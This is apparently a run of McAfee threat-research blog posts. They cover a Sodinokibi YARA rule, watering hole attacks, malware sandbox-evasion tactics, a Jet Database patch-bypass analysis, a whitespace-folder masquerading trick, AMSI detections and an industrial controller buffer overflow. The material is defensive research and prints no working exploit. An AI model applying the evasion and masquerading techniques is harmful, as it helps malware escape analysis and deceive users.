  • File Deletion
  • Modify Registry
  • Query Registry
  • Registry modification
  • Query information of the user
  • Crypt Files
  • Destroy Files
  • Make C2 connections to send information of the victim
  • Modify system configuration
  • Elevate privileges

YARA Rule

rule Sodinokobi

{

/*

This rule detects Sodinokobi Ransomware in memory in old samples and perhaps future.

*/

meta:

author      = “McAfee ATR team”

version     = “1.0”

description = “This rule detect Sodinokobi Ransomware in memory in old samples and perhaps future.”

strings:

$a = { 40 0F B6 C8 89 4D FC 8A 94 0D FC FE FF FF 0F B6 C2 03 C6 0F B6 F0 8A 84 35 FC FE FF FF 88 84 0D FC FE FF FF 88 94 35 FC FE FF FF 0F B6 8C 0D FC FE FF FF }

$b = { 0F B6 C2 03 C8 8B 45 14 0F B6 C9 8A 8C 0D FC FE FF FF 32 0C 07 88 08 40 89 45 14 8B 45 FC 83 EB 01 75 AA }

condition:

all of them

}

 

The post McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us appeared first on McAfee Blogs.

How Visiting a Trusted Site Could Infect Your Employees

The Artful and Dangerous Dynamics of Watering Hole Attacks

A group of researchers recently published findings of an exploitation of multiple iPhone vulnerabilities using websites to infect final targets. The key concept behind this type of attack is the use of trusted websites as an intermediate platform to attack others, and it’s defined as a watering hole attack.

How Does it Work?

Your organization is an impenetrable fortress that has implemented every single cybersecurity measure. Bad actors are having a hard time trying to compromise your systems. But what if the weakest link is not your organization, but a third-party? That is where an “island hopping” attack can take apart your fortress.

 “Island hopping” was a military strategy aimed to concentrate efforts on strategically positioned (and weaker) islands to gain access to a final main land target.

One relevant instance of “island hopping” is a watering hole attack. A watering hole attack is motivated by an attackers’ frustration. If they cannot get to a target, maybe they can compromise a weaker secondary one to gain access to the intended one? Employees in an organization interact with third-party websites and services all the time. It could be with a provider, an entity in the supply chain, or even with a publicly available website. Even though your organization may have cutting edge security perimeter protection, the third parties you interact with may not.

In this type of attack, bad actors start profiling employees to find out what websites/services they usually consume. What is the most frequented news blog? Which flight company do they prefer? Which service provider do they use to check pay stubs? What type of industry is the target organization in and what are the professional interests of its employees, etc.?

Based on this profiling, they analyze which one of the many websites visited by employees is weak and vulnerable. When they find one, the next step is compromising this third-party website by injecting malicious code, hosting malware, infecting existing/trusted downloads, or redirecting the employee to a phishing site to steal credentials. Once the site has been compromised, they will wait for an employee of the target organization to visit the site and get infected, sometimes pushed by an incentive such as a phishing email sent to the employees. Sometimes this requires some sort of interaction, such as the employee using a file upload form, downloading a previously trusted PDF report or attempting to login on a phishing site after a redirection from the legitimate one. Finally, bad actors will move laterally from the infected employee device to the desired final target(s).

Figure 1: Watering Hole Attack Dynamics

Victims of a watering hole attack are not only the final targets but also strategic organizations that are involved during the attack chain. As an example, a watering hole attack was discovered in March 2019, targeting member states of the United Nations by compromising the International Civil Aviation Organization (ICAO) as intermediate target[1]. Because the ICAO was a website frequented by the intended targets, it got compromised by exploiting vulnerable servers. Another example from last year is a group of more than 20 news and media websites that got compromised as intermediate targets to get to specific targets in Vietnam and Cambodia[2].

Risk analysis

Because this kind of attack relies on vulnerable but trusted third-party sites, it usually goes unnoticed and is not easily linked to further data breaches. To make sure this potential threat is being considered in your risk analysis, here are some of the questions you need to ask:

  • How secure are the websites and services of the entities I interact with?
  • Are the security interests of third parties aligned with mine? (Hint: probably not! You may be rushing to patch your web server but that does not mean a third-party site is doing the same).
  • What would be the impact of a watering hole attack for my organization?

As with every threat, it is important to analyze both the probability of this threat as well as how difficult it would be for attackers to implement it. This will vary from organization to organization, but one generic approach is to analyze the most popular websites. When checking the top one million websites around the world, it is interesting to note that around 60%[3] of these are using Content Management Systems (CMSs) such as WordPress, Joomla or Drupal.

This creates an extra challenge as these popular CMSs are statistically more likely to be present in an organization’s network traffic and, therefore, are more likely to be targeted for a watering hole attack. It is not surprising then that dozens of vulnerabilities on CMSs are discovered and exploited every month (around 1000 vulnerabilities were discovered in the last two years for just the top 4 CMSs[4]). What is more concerning is that CMSs are designed to be integrated with other services and extended using plugins (more than 55,000 plugins are available as of today). This further expands the attack surface as it creates the opportunity of compromising small libraries/plugins being used by these frameworks.

Consequently, CMSs are frequently targeted by watering hole attacks by exploiting vulnerabilities that enable bad actors to gain control of the server/site, modifying its content to serve a malicious purpose. In some advanced scenarios, they will also add fingerprinting scripts to check the IP address, time zone and other useful details about the victim. Based on this data, bad actors can automatically decide to let go when the victim is not an employee of the desired company or move further in the attack chain when they have hit the jackpot.

Defending against watering hole attacks

As organizations harden their security posture, bad actors are being pushed to new boundaries. Therefore, watering hole attacks are gaining traction as these allows bad actors to compromise intermediate (more vulnerable) targets to later get access to the intended final target. To help keep your organization secure against watering hole attacks, make sure you are including web protection. McAfee Web Gateway can help provide additional defense against certain class of attacks even when the user is visiting a site that’s been compromised by a watering hole attack, with behavior emulation that aims to prevents zero-day malware in milliseconds as traffic is processed. You may also want to:

  • Build a Zero Trust model, especially around employees visiting publicly available websites, to make sure that even if a watering hole attack is targeting your organization, you can stop it from moving forward.
  • Regularly check your organization’s network traffic to identify vulnerable third-party websites that your employees might be exposed to.
  • Check the websites and services exposed by your organization’s providers. Are these secure enough and properly patched? If not, consider the possibility that these may become intermediate targets and apply policies to limit the exposure to these sites (e.g. do not allow downloads if that is an option).
  • When possible, alert providers about unpatched web servers, CMS frameworks or libraries, so they can promptly mitigate the risk.

Dealing with watering hole attacks requires us to be more attentive and to carefully review the websites we visit, even if these are cataloged as trusted sites. By doing so, we will not only mitigate the risk of watering hole attacks, but also steer away from one possible pathway to data breaches.

[1] https://securityaffairs.co/wordpress/81790/apt/icao-hack-2016.html

[2] https://www.scmagazine.com/home/security-news/for-the-last-few-months-the-threat-group-oceanlotus-also-known-as-apt32-and-apt-c-00-has-been-carrying-out-a-watering-hole-campaign-targeting-several-websites-in-southeast-asia/

[3] “Usage of content management systems”, https://w3techs.com/technologies/overview/content_management/all

[4] “The state of web application vulnerabilities in 2018”, https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/

The post How Visiting a Trusted Site Could Infect Your Employees appeared first on McAfee Blogs.

Evolution of Malware Sandbox Evasion Tactics – A Retrospective Study

Executive Summary

Malware evasion techniques are widely used to circumvent detection as well as analysis and understanding. One of the dominant categories of evasion is anti-sandbox detection, simply because today’s sandboxes are becoming the fastest and easiest way to have an overview of the threat. Many companies use these kinds of systems to detonate malicious files and URLs found, to obtain more indicators of compromise to extend their defenses and block other related malicious activity. Nowadays we understand security as a global process, and sandbox systems are part of this ecosystem, and that is why we must take care with the methods used by malware and how we can defeat it.

Historically, sandboxes had allowed researchers to visualize the behavior of malware accurately within a short period of time. As the technology evolved over the past few years, malware authors started producing malicious code that delves much deeper into the system to detect the sandboxing environment.

As sandboxes became more sophisticated and evolved to defeat the evasion techniques, we observed multiple strains of malware that dramatically changed their tactics to remain a step ahead. In the following sections, we look back on some of the most prevalent sandbox evasion techniques used by malware authors over the past few years and validate the fact that malware families extended their code in parallel to introducing more stealthier techniques.

The following diagram shows one of the most prevalent sandbox evasion tricks we will discuss in this blog, although many others exist.

Delaying Execution

Initially, several strains of malware were observed using timing-based evasion techniques [latent execution], which primarily boiled down to delaying the execution of the malicious code for a period using known Windows APIs like NtDelayExecution, CreateWaitTableTImer, SetTimer and others. These techniques remained popular until sandboxes started identifying and mitigating them.

GetTickCount

As sandboxes identified malware and attempted to defeat it by accelerating code execution, it resorted to using acceleration checks using multiple methods. One of those methods, used by multiple malware families including Win32/Kovter, was using Windows API GetTickCount followed by a code to check if the expected time had elapsed. However, we observed several variations of this method across malware families.

This anti-evasion technique could be easily bypassed by the sandbox vendors simply creating a snapshot with more than 20 minutes to have the machine running for more time.

API Flooding

Another approach that subsequently became more prevalent, observed with Win32/Cutwail malware, is calling the garbage API in the loop to introduce the delay, dubbed API flooding. Below is the code from the malware that shows this method.

 

 

Inline Code

We observed how this code resulted in a DOS condition since sandboxes could not handle it well enough. On the other hand, this sort of behavior is not too difficult to detect by more involved sandboxes. As they became more capable of handling the API based stalling code, yet another strategy to achieve a similar objective was to introduce inline assembly code that waited for more than 5 minutes before executing the hostile code. We found this technique in use as well.

Sandboxes are now much more capable and armed with code instrumentation and full system emulation capabilities to identify and report the stalling code. This turned out to be a simplistic approach which could sidestep most of the advanced sandboxes. In our observation, the following depicts the growth of the popular timing-based evasion techniques used by malware over the past few years.

Hardware Detection

Another category of evasion tactic widely adopted by malware was fingerprinting the hardware, specifically a check on the total physical memory size, available HD size / type and available CPU cores.

These methods became prominent in malware families like Win32/Phorpiex, Win32/Comrerop, Win32/Simda and multiple other prevalent ones. Based on our tracking of their variants, we noticed Windows API DeviceIoControl() was primarily used with specific Control Codes to retrieve the information on Storage type and Storage Size.

Ransomware and cryptocurrency mining malware were found to be checking for total available physical memory using a known GlobalMemoryStatusEx () trick. A similar check is shown below.

Storage Size check:

Illustrated below is an example API interception code implemented in the sandbox that can manipulate the returned storage size.

Subsequently, a Windows Management Instrumentation (WMI) based approach became more favored since these calls could not be easily intercepted by the existing sandboxes.

Here is our observed growth path in the tracked malware families with respect to the Storage type and size checks.

CPU Temperature Check

Malware authors are always adding new and interesting methods to bypass sandbox systems. Another check that is quite interesting involves checking the temperature of the processor in execution.

A code sample where we saw this in the wild is:

The check is executed through a WMI call in the system. This is interesting as the VM systems will never return a result after this call.

CPU Count

Popular malware families like Win32/Dyreza were seen using the CPU core count as an evasion strategy. Several malware families were initially found using a trivial API based route, as outlined earlier. However, most malware families later resorted to WMI and stealthier PEB access-based methods.

Any evasion code in the malware that does not rely on APIs is challenging to identify in the sandboxing environment and malware authors look to use it more often. Below is a similar check introduced in the earlier strains of malware.

There are number of ways to get the CPU core count, though the stealthier way was to access the PEB, which can be achieved by introducing inline assembly code or by using the intrinsic functions.

One of the relatively newer techniques to get the CPU core count has been outlined in a blog, here. However, in our observations of the malware using CPU core count to evade automated analysis systems, the following became adopted in the outlined sequence.

User Interaction

Another class of infamous techniques malware authors used extensively to circumvent the sandboxing environment was to exploit the fact that automated analysis systems are never manually interacted with by humans. Conventional sandboxes were never designed to emulate user behavior and malware was coded with the ability to determine the discrepancy between the automated and the real systems. Initially, multiple malware families were found to be monitoring for Windows events and halting the execution until they were generated.

Below is a snapshot from a Win32/Gataka variant using GetForeGroundWindow and checking if another call to the same API changes the Windows handle. The same technique was found in Locky ransomware variants.

Below is another snapshot from the Win32/Sazoora malware, checking for mouse movements, which became a technique widely used by several other families.

Malware campaigns were also found deploying a range of techniques to check historical interactions with the infected system. One such campaign, delivering the Dridex malware, extensively used the Auto Execution macro that triggered only when the document was closed. Below is a snapshot of the VB code from one such campaign.

The same malware campaign was also found introducing Registry key checks in the code for MRU (Most Recently Used) files to validate historical interactions with the infected machine. Variations in this approach were found doing the same check programmatically as well.

MRU check using Registry key: \HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\User MRU

Programmatic version of the above check:

Here is our depiction of how these approaches gained adoption among evasive malware.

Environment Detection

Another technique used by malware is to fingerprint the target environment, thus exploiting the misconfiguration of the sandbox. At the beginning, tricks such as Red Pill techniques were enough to detect the virtual environment, until sandboxes started to harden their architecture. Malware authors then used new techniques, such as checking the hostname against common sandbox names or the registry to verify the programs installed; a very small number of programs might indicate a fake machine. Other techniques, such as checking the filename to detect if a hash or a keyword (such as malware) is used, have also been implemented as has detecting running processes to spot potential monitoring tools and checking the network address to detect blacklisted ones, such as AV vendors.

Locky and Dridex were using tricks such as detecting the network.

Using Evasion Techniques in the Delivery Process

In the past few years we have observed how the use of sandbox detection and evasion techniques have been increasingly implemented in the delivery mechanism to make detection and analysis harder. Attackers are increasingly likely to add a layer of protection in their infection vectors to avoid burning their payloads. Thus, it is common to find evasion techniques in malicious Word and other weaponized documents.

McAfee Advanced Threat Defense

McAfee Advanced Threat Defense (ATD) is a sandboxing solution which replicates the sample under analysis in a controlled environment, performing malware detection through advanced Static and Dynamic behavioral analysis. As a sandboxing solution it defeats evasion techniques seen in many of the adversaries. McAfee’s sandboxing technology is armed with multiple advanced capabilities that complement each other to bypass the evasion techniques attempted to the check the presence of virtualized infrastructure, and mimics sandbox environments to behave as real physical machines. The evasion techniques described in this paper, where adversaries widely employ the code or behavior to evade from detection, are bypassed by McAfee Advanced Threat Defense sandbox which includes:

  • Usage of windows API’s to delay the execution of sample, hard disk size, CPU core numbers and other environment information .
  • Methods to identify the human interaction through mouse clicks , keyboard strokes , Interactive Message boxes.
  • Retrieval of hardware information like hard disk size , CPU numbers, hardware vendor check through registry artifacts.
  • System up time to identify the duration of system alive state.
  • Check for color bit and resolution of Windows .
  • Recent documents and files used.

In addition to this, McAfee Advanced Threat Defense is equipped with smart static analysis engines as well as machine-learning based algorithms that play a significant detection role when samples detect the virtualized environment and exit without exhibiting malware behavior. One of McAfee’s flagship capability, the Family Classification Engine, works on assembly level and provides significant traces once a sample is loaded in memory, even though the sandbox detonation is not completed, resulting in enhanced detection for our customers.

Conclusion

Traditional sandboxing environments were built by running virtual machines over one of the available virtualization solutions (VMware, VirtualBox, KVM, Xen) which leaves huge gaps for evasive malware to exploit.

Malware authors continue to improve their creations by adding new techniques to bypass security solutions and evasion techniques remain a powerful means of detecting a sandbox. As technologies improve, so also do malware techniques.

Sandboxing systems are now equipped with advanced instrumentation and emulation capabilities which can detect most of these techniques. However, we believe the next step in sandboxing technology is going to be the bare metal analysis environment which can certainly defeat any form of evasive behavior, although common weaknesses will still be easy to detect.

The post Evolution of Malware Sandbox Evasion Tactics – A Retrospective Study appeared first on McAfee Blogs.

Apple iOS Attack Underscores Importance of Threat Research

The recent discovery of exploit chains targeting Apple iOS is the latest example of how cybercriminals can successfully operate malicious campaigns, undetected, through the use of zero-day vulnerabilities.

In this scenario, a threat actor or actors operated multiple compromised websites, using at least one or more zero-day vulnerabilities and numerous unique exploit chains and known vulnerabilities to compromise iPhones, even the latest versions of the operating system, for more than two years. It takes remarkable talent and resources to operate this kind of infrastructure without being detected, as potentially thousands of users were compromised without the campaign being identified.

Every villain necessitates a hero, and this campaign underscores the importance of threat research and responsible vulnerability disclosure. Cybercriminals are getting faster, smarter, and more dangerous with each day that passes. The collective power of a global community of researchers working together to identify and disclose critical vulnerabilities, such as those used in this attack, is an important way to make meaningful progress towards eliminating these types of malicious campaigns. Equally as important is dissecting attacks in their aftermath to expose unique and interesting characteristics and empower defenders and developers to mitigate these threats in the future. With that said, let’s take a look.

An Attack Hiding in Plain Sight

This attack is unique in that the implant was not operating stealthily and was uploading information without encryption. This means a user monitoring their network traffic would notice activity as their information was being uploaded to the attacker’s server in cleartext.

Further, there appears to be debug messages left in the code, so a user connecting their phone to their computer and reviewing console logs, would notice activity as well.

However, given the “closed” operating system on the iPhone, a user would need to take the extra step of connecting their phone to their computer in order to notice these attack indicators. Given this, even a power user would be likely to remain unaware of an infection.

The Value of iOS Exploits

Finding iOS exploits in general is challenging due to the proprietary codebase and modern security mitigations. However, the type of exploits that require no user interaction and result in full remote code execution are the most rare, valuable, and difficult to uncover.

Adding further complexity to the attack, many mobile device exploits today require more than a single vulnerability to be successful; in many cases, 3-4 bugs are required to achieve elevated remote code execution on a target system. This is typically due to mitigations such as sandboxes/containers, restrictions on code execution, and reduced user privileges, making a chain of vulnerabilities necessary. This complexity reduces the success rate of an attack based on the likelihood of one or more of the bugs being discovered and “burned,” or patched out by the vendor.

Apple is a strong player in the responsible disclosure arena, recently expanding its offering of up to $1 million USD for certain vulnerabilities. Vulnerability brokers, who resell vulnerabilities, will reportedly pay up to 3 million USD for zero-interaction remote code execution vulnerabilities on iOS. It’s easy to understand the value of bugs that don’t require interaction from the victim and result in full remote code execution. With the popularity of Apple’s operating systems across mobile devices and laptops, even these prices may be not be enough to encourage threat actors to choose to responsibly disclose their findings over more nefarious purposes.

The Power of Vulnerability Disclosure

Two of the most significant questions this discovery raises are how was this adversary able to operate for so long, primarily using known exploits, and what kind of impact were they able to achieve?

These questions bring us full circle to the value of vulnerability disclosure. Through hardware and software analysis and responsible disclosure, meaningful progress can be made towards exposing these types of vulnerabilities before they can be leveraged by bad actors for nefarious purposes.

The post Apple iOS Attack Underscores Importance of Threat Research appeared first on McAfee Blogs.

Analyzing and Identifying Issues with the Microsoft Patch for CVE-2018-8423

Introduction

As of July 2019, Microsoft has fixed around 43 bugs in the Jet Database Engine. McAfee has reported a couple of bugs and, so far, we have received 10 CVE’s from Microsoft. In our previous post, we discussed the root cause of CVE-2018-8423. While analyzing this CVE and patch from Microsoft, we found that there was a way to bypass it which resulted in another crash. We reported it to Microsoft and it fixed it in the January 19 patch Tuesday. This issue was assigned CVE-2019-0576. We recommend our users to install proper patches and follow proper patch management policy and keep their windows installations up to date.

In this post we will do the root cause analysis of CVE-2019-0576. To exploit this vulnerability, an attacker needs to use social engineering techniques to convince a victim to open a JavaScript file which uses an ADODB connection object to access a malicious Jet Database file. Once the malicious Jet Database file is accessed, it calls the vulnerable function in msrd3x40.dll which can lead to exploitation of this vulnerability.

Background

As mentioned in our previous post, CVE-2018-8423 can be triggered using a malicious Jet Database file and, as per the analysis, this issue was in the index number field. If the index number was too big the program would crash at the following location:

Here, ecx contains the malicious index number. On applying the Microsoft patch for CVE-2018-8423 we can see that, on opening this malicious file, we get the following error which denotes that the issue is fixed, and the crash does not occur anymore:

 

Analyzing the Patch

We decided to dig deeper and see exactly how this issue was patched. On analyzing the “msrd3x40!TblPage::CreateIndexes” function, we can see that there is a check to see if “IndexNumber” is greater than 0xFF, or 256, as can be seen below:

 

Here, the ecx which contains the index number has the malicious value of “00002300” and it is greater than 0xFF. If we see the code, there is a jump instruction. If we follow this jump instruction, we reach the following location:

We can see that there is a call to the “msrd3x40!Err::SetError” function, meaning the malicious file will not be parsed if the index value is greater than 0xFF and the program will give the error message “Unrecognized database format” and terminate.

Finding Another Issue with the Patch

By looking at the patch, it was obvious that program will terminate if the index value is greater than 0xFF, but we decided to try it with an index value “00 00 00 20” which is less than 0xFF, and we got another crash in the function “msrd3x40!Table::FindIndexFromName”, as can be seen below:

Finding the Root Cause of the New Issue

As we know, if we give any index value which is less then 0xFF, we get a crash in the function “msrd3x40!Table::FindIndexFromName”, so we decided to analyze it further to find out why that is happening.

The crash is at the following location:

It seems that program is trying to access location “[ebx+eax*4+574h]” but it is not accessible, meaning it is an Out of Bound Read issue.

This crash looks familiar as it was also seen in CVE-2018-8423, except that it was an Out of Bound Write, while this seems to be an Out of Bound Read. If we look at eax it contains “0055b7a8” which, when multiplied by 4, becomes a very large value.

If we look at the file it looks like this:

As can be seen in below image, if we parse this file, this value of “00 00 00 20” (in little endian from the above image), denotes the number of an index whose name is “ParentIDName”:

Looking at the debugger at the point of the crash, it seems that ebx+574h points to a memory location and eax contains an index value which is getting multiplied by 4. Now we need to figure out the following:

  1. What will be the value of eax that will cause the crash? We know that it should be less than 0xFF. But what would be the lowest value?
  2. What is the root cause of this issue?

On setting a breakpoint on “msrd3x40!Table::FindIndexFromName” and changing the index number to “0000001f”, (which does not cause a crash but helps with the debugging and understanding the program flow) we can see that edx contains the pointer to an index name which, in this case, is “ParentIdName”:

Debugging further we can see that the eax value comes from [ebp] and the ebp value comes from [ebx+5F4h] as can be seen below:

When we look at “ebx+5F4” we can see the following:

We can see that “ebx+5F4” contains the index number for all the indexes in the file. In our case the file has two indexes and their number are “00 00 00 01” and “00 00 00 1f”. If we carefully review the memory we can figure out that the maximum number of indices which can be stored here are 0x20, or 32:

Start location: 00718d54

Each index number is 4 bytes long. So 0x20*4 + 00718d54 = 00718DD4

After this, if we look at ebx+574+4, we can see that it contains the pointer to index names:

So, the overall memory structure is like this:

There are only 0x80 or 128 bytes available to save index name pointer at location EBX+574. Each pointer gets saved at an index number location, i.e. for index number 1 it will be saved at EBX+574+1*4, the location for index number 2 will be saved at EBX+574+2*4 and so on. (index number starts from 0).

In this case, if we give an index number which is more than 31, the program will overwrite data past 0x80 bytes, which will be at the start of the EBX+5F4 location, which is the index number from the malicious file. So, in this case, if we give the value “00 00 00 20” instead of “00 00 00 1f”, it will overwrite the index number at the EBX+5F4 location, as can be seen below:

Now the program tries to execute this instruction in “msrd3x40!Table::FindIndexFromName’

Mov ecx, dword ptr [ebx+eax*4+574h]

Here, eax contains the index number which should be “00 00 00 01” but, since it is overwritten by “0055b7a8” which is a memory address, on multiplying it with 4, it becomes a huge number and then 574h is getting added to it. So, if that memory area does not exist and the program tries to read from that memory, we get an access violation error.

So, to answer the questions we had:

  1. Any value which is less then 0xFF and greater then 0x31 will cause a crash if the resulting memory location from [ebx+eax*4+574h] is not accessible.
  2. The root cause is that an index number is getting overwritten by a memory location, causing invalid memory access in this case.

How is it Fixed by Microsoft in the Jan 19 Patch?

We again decided to analyze the patch to see how this issue was fixed. As is clear from the analysis, any value which is greater than or equal to 0x20 or 32 still causes a crash so, ideally, the patch should be checking this. Microsoft has added this check in the Jan 19 patch release, as can be seen below:

As can be seen in the above image, eax hold the index value here and it is compared with 0x20. If it is more than or equal to 0x20 the program jumps to location 72fe1c00. If we go to that location, we can see the following:

As can be seen in the above image, it calls the destructor and then calls msrd3x40!Err::SetError function and returns. So, the program will display a message saying, “Unrecognized database format” and then terminate.

Conclusion

We reported this issue to Microsoft in October 2018 and it fixed this issue in the Jan 19 patch Tuesday. It was assigned CVE-2019-0576 to this issue. We recommend our users keep their Windows installations up to date and install vendor patches on a regular basis.

McAfee Coverage:

McAfee Network Security Platform customers are protected from this vulnerability by Signature IDs 0x45251700 – HTTP: Microsoft JET Database Engine Remote Code Execution Vulnerability (CVE-2018-8423) and 0x4525890 – HTTP: Microsoft JET Database Engine Remote Code Execution Vulnerability (CVE-2019-0576).

McAfee AV detects the malicious file as BackDoor-DKI.dr .

McAfee HIPS, Generic Buffer Overflow Protection (GBOP) feature will often cover this, depending on the process used to exploit the vulnerability.

References

The post Analyzing and Identifying Issues with the Microsoft Patch for CVE-2018-8423 appeared first on McAfee Blogs.

The Twin Journey, Part 3: I’m Not a Twin, Can’t You See my Whitespace at the End?

In this series of 3 blogs (you can find part 1 here, and part 2 here), so far we have understood the implications of promoting files to “Evil Twins” where they can be created and remain in the system as different entities once case sensitiveness is enabled, and some issues that could be raised by just basic assumptions on case-sensitiveness during development.

In this 3rd post we focus on the “confusion” technique, where even though the technique is already known (Medium / Tyranidslair), the ramifications of these effects have not all been analyzed yet.

Going back to normalization, some Win32 API’s remove trailing whitespaces (and other special characters) from the path name.

As mentioned in the last publication, the normalization can, in some cases, provide the wrong result.

The common scenario that could be used as “bait” for the user to click, and even to hide what is seen, is to create a directory with the same name ending with a whitespace.

A very trivial example “That’s not my notepad…..”:

Open task manager, Right click on the “notepad” with putty icon -> Properties. (The properties were read from the “non-trailing-space” binary)

Open Explorer on “C:\Windows “; it will generate the illusion that the original files (from the folder without trailing whitespace) are there. This will happen for any folder/file not present in the whitespace version.

Screenshots opening a McAfee Agent Folder:

Both folders opened; note that the whitespace version does not have any .dll or additional .exe but Explorer renders the missing files from the “normalized – non-whitespace directory”.

Trying to open the dll…

Getting properties from task manager will fetch those from the normalized folder path, that means you can be tricked to think it is a trusted app.

Watch the video recorded by our expert Cedric Cochin illustrating this technique:

Related Links / Blogs:

https://tyranidslair.blogspot.com/2019/02/ntfs-case-sensitivity-on-windows.html

https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e

The post The Twin Journey, Part 3: I’m Not a Twin, Can’t You See my Whitespace at the End? appeared first on McAfee Blogs.

McAfee AMSI Integration Protects Against Malicious Scripts

Following on from the McAfee Protects against suspicious email attachments blog, this blog describes how the AMSI (Antimalware Scan Interface) is used within the various McAfee Endpoint products. The AMSI scanner within McAfee ENS 10.6 has already detected over 650,000 pieces of Malware since the start of 2019. This blog will help show you how to enable it, and explain why it should be enabled, by highlighting some of the malware we are able to detect with it.

ENS 10.6 and Above

The AMSI scanner will scan scripts once they have been executed. This enables the scanner to de-obfuscate the script and scan it using DAT content. This is useful as the original scripts can be heavily obfuscated and are difficult to generically detect, as shown in the image below:

Figure 1 – Obfuscated VBS script being de-obfuscated with AMSI

Enable the Scanner

By default, the AMSI scanner is set to observe mode. This means that the scanner is running but it will not block any detected scripts; instead it will appear in the ENS log and event viewer as show below:

Figure 2 – Would Block in the Event log

To actively block the detected threats, you need to de-select the following option in the ENS settings:

Figure 3 – How to enable Blocking

Once this has been done, the event log will show that the malicious script has now been blocked:

Figure 4 – Action Blocked in Event Log

In the Wild

Since January 2019, we have observed over 650,000 detections and this is shown in the IP Geo Map below:

Figure 5 – Geo Map of all AMSI detection since January 2019

We are now able to block some of the most prevalent threats with AMSI. These include PowerMiner, Fileless MimiKatz and JS downloader families such as JS/Nemucod.

The section below describes how these families operate, and their infection spread across the globe.

PowerMiner

The PowerMiner malware is a cryptocurrency malware whose purpose is to infect as many machines as possible to mine Monero currency. The initial infection vector is via phishing emails which contain a batch file. Once executed, this batch file will download a malicious PowerShell script which will then begin the infection process.

The infection flow is shown in the graph below:

Figure 6 – Infection flow of PowerMiner

With the AMSI scanner, we can detect the malicious PowerShell script and stop the infection from occurring. The Geo IP Map below shows how this malware has spread across the globe:

Figure 7 – Geo Map of PS/PowerMiner!ams  detection since January 2019

McAfee Detects PowerMiner as PS/PowerMiner!ams.a.

Fileless Mimikatz

Mimikatz is a tool which enables the extraction of passwords from the Windows LSASS. Mimikatz was previously used as a standalone tool, however malicious scripts have been created which download Mimikatz into memory and then execute it without it ever being downloaded to the local disk. An example of a fileless Mimikatz script is shown below (note: this can be heavily obfuscated):

Figure 8 – Fileless Mimikatz PowerShell script

The Geo IP Map below shows how fileless Mimikatz has spread across the globe:

Figure 9 – Geo IP Map of PS/Mimikatz detection since January 2019

McAfee can detect this malicious script as PS/Mimikatz.a, PS/Mimikatz.b, PS/Mimikatz.c.

JS/Downloader

JS downloaders are usually spread via email. The purpose of these JavaScript files is to download further payloads such as ransomware, password stealers and backdoors to further exploit the compromised machine. The infection chain is shown below, as well as an example phishing email:

Figure 10 – Infection flow of Js/Downloader

Figure 11 – Example phishing email distributing JS/Downloader

Below is the IP Geo Map of AMSI JS/Downloader detections since January 2019:

Figure 12 – Geo Map of AMSI-FAJ detection since January 2019

The AMSI scanner detects this threat as AMSI-FAJ.

MVISION Endpoint and ENS 10.7

MVISION Endpoint and ENS 10.7 (Not currently released) will use Real Protect Machine Learning to detect PowerShell AMSI generated content.

This is done by extracting features from the AMSI buffers and running these against the ML classifier to decide if the script is malicious or not. An example of this is shown below:

 

Thanks to this detection technique, MVISION EndPoint can detect Zero-Day PowerShell threats.

Conclusion

We hope that this blog has helped highlight why enabling AMSI is important and how it will help keep your environments safe.

We recommend our customers who are using ENS 10.6 on a Windows 10 environment enable AMSI in ‘Block’ mode so that when a malicious script is detected it will be terminated. This will protect Endpoints from the threats mentioned in this blog, as well as countless others.

Customers using MVISION EndPoint are protected by default and do not need to enable ‘Block’ mode.

We also recommend reading McAfee Protects against suspicious email attachments which will help protect you against malware being spread via email, such as the JS/Downloaders described in this blog.

All testing was performed with the V3 DAT package 3637.0 which contains the latest AMSI Signatures. Signatures are being added to the V3 DAT package daily, so we recommend our customers always use the latest ones.

The post McAfee AMSI Integration Protects Against Malicious Scripts appeared first on McAfee Blogs.

From Building Control to Damage Control: A Case Study in Industrial Security Featuring Delta’s enteliBUS Manager

Management. Control. It seems that you can’t stick five people in a room together without one of them trying to order the others around. This tendency towards centralized authority is not without reason, however – it is often more efficient to have one person, or thing, calling the shots. For an example of the latter, one needs look no further than Delta’s enteliBUS Manager, or eBMGR. Put simply, this device aims to centralize control for various pieces of hardware often found in corporate or industrial settings, whether it be temperature and humidity controls for a server room, a boiler and its corresponding alarms and sensors in a factory, or access control and lighting in a business. The advantages seem obvious, too – it can be configured to adjust fan speeds according to thermostat readings or sound an alarm if pressure crosses a certain threshold, all with little human interaction.

The disadvantages, while less obvious, become clear when one considers tech-savvy malicious actors. Suddenly, your potentially critical system now has a single point of failure, and one that is attached to a network, to make matters worse.

Consider for a moment a positive pressure room in a hospital, the kind typically used to keep out contaminants during surgeries. Managing rooms such as these is a typical application for the eBMGR and it does not take an overactive imagination to envision what kind of damage a bad actor could cause if they disrupted such a sensitive environment.

Management. Control. That’s what’s at stake if a device such as this is not properly secured. It’s also what made this device such a high priority for McAfee’s Advanced Threat Research team. The decision to make network-connected critical systems such as these demands an extremely high standard of software security – finding where it might fall short is precisely our job.

With these stakes in mind, our team went to work. We began by hooking up an eBMGR unit to a network with several other devices to simulate an environment somewhat true to life. Using a technique known as “fuzzing”, we then blasted the device with all kinds of deliberately malformed network traffic, looking for a chink in the armor. That is one advantage often afforded to the bad guys in software security; they can make many mistakes; manufacturers need only make one.

Perhaps unsurprisingly, persistence and creativity led us to discover one such mistake: a mismatch in the memory sizes used to handle incoming network data created what is often referred to as a buffer overflow vulnerability. This seemingly innocuous mistake rendered the eBMGR vulnerable to our carefully crafted network attack, which allows a hacker on the same network to gain complete control of the device’s operating system. Worse still, the attack uses what is known as broadcast traffic, meaning they can launch the attack without knowing the location of the targets on the network. The result is a twisted version of Marco Polo – the hacker needs only shout “Marco!” into the darkness and wait for the unsuspecting targets to shout “Polo!” in response.

In this field, complete control of the operating system is typically the finish line. But we weren’t content with just that. After all, controlling the eBMGR on its own is not all that interesting; we wanted to see if we could use it to control all the devices it was connected to. Unfortunately, we did not have the source code for the device’s software, so this new goal proved non-trivial.

